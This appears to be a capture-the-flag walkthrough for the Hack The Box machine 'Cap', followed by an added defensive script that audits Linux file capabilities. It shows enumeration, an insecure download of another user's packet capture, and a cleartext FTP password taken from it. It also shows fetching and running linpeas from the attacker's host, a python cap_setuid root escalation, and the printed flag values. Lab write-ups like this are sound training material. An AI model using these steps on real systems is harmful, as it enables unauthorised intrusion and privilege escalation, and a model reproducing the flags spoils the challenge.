Cap
Sun, 22 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.245 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.245
Host is up (0.044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Thu, 19 Sep 2024 23:38:02 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Thu, 19 Sep 2024 23:37:56 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Thu, 19 Sep 2024 23:37:56 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: HEAD, OPTIONS, GET
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
|_ </html>
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.78 seconds
curl 10.10.10.245
<!DOCTYPE html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>Security Dashboard</title>
...
<ul class="collapse">
<li class="active"><a href="/">Dashboard</a></li>
<li><a href="/capture">Security Snapshot (5 Second PCAP + Analysis)</a></li>
<li><a href="/ip">IP Config</a></li>
<li><a href="/netstat">Network Status</a></li>
</ul>
curl 10.10.10.245/capture
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/data/1">/data/1</a>. If not click the link.
curl 10.10.10.245/data/1
<button class="btn btn-info" onclick="location.href='/download/1'">Download</button>
curl 10.10.10.245/ip
<div class="main-content-inner">
<pre>
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.245 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:fe94:faf0 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:fe94:faf0 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:94:fa:f0 txqueuelen 1000 (Ethernet)
RX packets 120139 bytes 8006618 (8.0 MB)
RX errors 0 dropped 193 overruns 0 frame 0
TX packets 134592 bytes 9286853 (9.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 55456 bytes 4262438 (4.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 55456 bytes 4262438 (4.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0</pre>
</div>
</div>
<!-- main content area end -->
curl 10.10.10.245/netstat
<div class="main-content-inner">
<pre>
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name Timer
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1001 35718 - off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 34273 - off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 36249 - off (0.00/0/0)
tcp 0 0 10.10.10.245:80 10.10.16.7:55598 ESTABLISHED 1001 150386 - off (0.00/0/0)
tcp6 0 0 :::21 :::* LISTEN 0 35350 - off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN 0 36260 - off (0.00/0/0)
udp 0 0 127.0.0.53:53 0.0.0.0:* 101 34272 - off (0.00/0/0)
udp 0 0 127.0.0.1:57466 127.0.0.53:53 ESTABLISHED 102 150572 - off (0.00/0/0)
udp 0 0 10.10.10.245:39422 1.1.1.1:53 ESTABLISHED 101 150573 - off (0.00/0/0)
</pre>
</div>
</div>
<!-- main content area end -->
ffuf -u "http://10.10.10.245/data/FUZZ" -v \
-w /usr/share/seclists/Fuzzing/3-digits-000-999.txt -fs 208
[Status: 200, Size: 17147, Words: 7066, Lines: 371, Duration: 49ms]
| URL | http://10.10.10.245/data/000
* FUZZ: 000
curl http://10.10.10.245/download/000 -o 0.pcap
wireshark 0.pcap
34 2.626895 192.168.196.16 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
35 2.667693 192.168.196.1 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=1 Ack=21 Win=1051136 Len=0
36 4.126500 192.168.196.1 192.168.196.16 FTP 69 Request: USER nathan
37 4.126526 192.168.196.16 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=21 Ack=14 Win=64256 Len=0
38 4.126630 192.168.196.16 192.168.196.1 FTP 90 Response: 331 Please specify the password.
39 4.167701 192.168.196.1 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=14 Ack=55 Win=1051136 Len=0
40 5.424998 192.168.196.1 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
41 5.425034 192.168.196.16 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=55 Ack=36 Win=64256 Len=0
42 5.432387 192.168.196.16 192.168.196.1 FTP 79 Response: 230 Login successful.
USER nathan
PASS Buck3tH4TF0RM3!
Response: 230 Login successful.
ssh nathan@10.10.10.245
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Sep 22 18:47:09 UTC 2024
System load: 0.0
Usage of /: 37.1% of 8.73GB
Memory usage: 22%
Swap usage: 0%
Processes: 229
Users logged in: 0
IPv4 address for eth0: 10.10.10.245
IPv6 address for eth0: dead:beef::250:56ff:fe94:faf0
=> There are 4 zombie processes.
63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Sep 22 12:48:29 2024 from 10.10.14.8
nathan@cap:~$ cat user.txt
cf0ce0f0f7d7b8e2e37bd40df907d3d2
nathan@cap:~$ curl 10.10.16.7:8088/linpeas.sh -O
nathan@cap:~$ bash ./linpeas.sh
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash");'
root@cap:~# cat /root/root.txt
04e8b55845d140be7788531e21a6079f
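The cap_setuid capability linpeas reported on /usr/bin/python3.8 is what turned a user shell into root here. As an added defensive check that is not part of this writeup, the script below parses `getcap -r /` output (both the older `path = caps` form shown above and the newer `path caps` form recent libcap prints) and rates each entry; the sample listing is constructed, and the interpreter list and capability set are my own choices.

```python
"""Audit getcap(8) output for interpreters carrying privilege-granting capabilities."""
import re

# Granted to a general-purpose interpreter, these amount to root.
PRIVILEGE_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
                  "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module"}
INTERPRETER_RE = re.compile(r"(python|perl|ruby|php|node|sh|bash|dash|zsh)[0-9.]*$")
CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)([+=])([eip]+)$")

def parse_getcap_line(line):
    """One `getcap -r /` line -> {"path", "caps"}, or {} if not an entry.
    Accepts the older 'path = caps' form (as in the linpeas output above)
    and the newer 'path caps' form that recent libcap prints."""
    line = line.strip()
    if "cap_" not in line:
        return {}
    path, _, rest = line.partition(" ")
    caps = set()
    for clause in rest.lstrip("= ").split():
        m = CLAUSE_RE.match(clause)
        if not m:
            return {}
        names, _op, flags = m.groups()
        if "p" in flags or "e" in flags:  # permitted/effective at exec time
            caps.update(names.split(","))
    return {"path": path, "caps": caps}

def assess(entry):
    """'critical': interpreter/shell with a privilege cap; 'review': other binary; else 'ok'."""
    if not entry["caps"] & PRIVILEGE_CAPS:
        return "ok"
    base = entry["path"].rsplit("/", 1)[-1]
    return "critical" if INTERPRETER_RE.match(base) else "review"

def audit(getcap_output):
    # (path, level, risky caps) for every entry in the listing
    entries = filter(None, map(parse_getcap_line, getcap_output.splitlines()))
    return [(e["path"], assess(e), sorted(e["caps"] & PRIVILEGE_CAPS))
            for e in entries]

# Constructed sample listing: the Cap finding plus two other entries.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/suexec cap_setuid,cap_setgid=ep
"""

if __name__ == "__main__":
    for path, level, caps in audit(SAMPLE):
        print(f"{level:8s} {path} {','.join(caps)}")
```

Run it against real `getcap -r / 2>/dev/null` output on a host; any "critical" line is the Cap misconfiguration and should be removed with `setcap -r`.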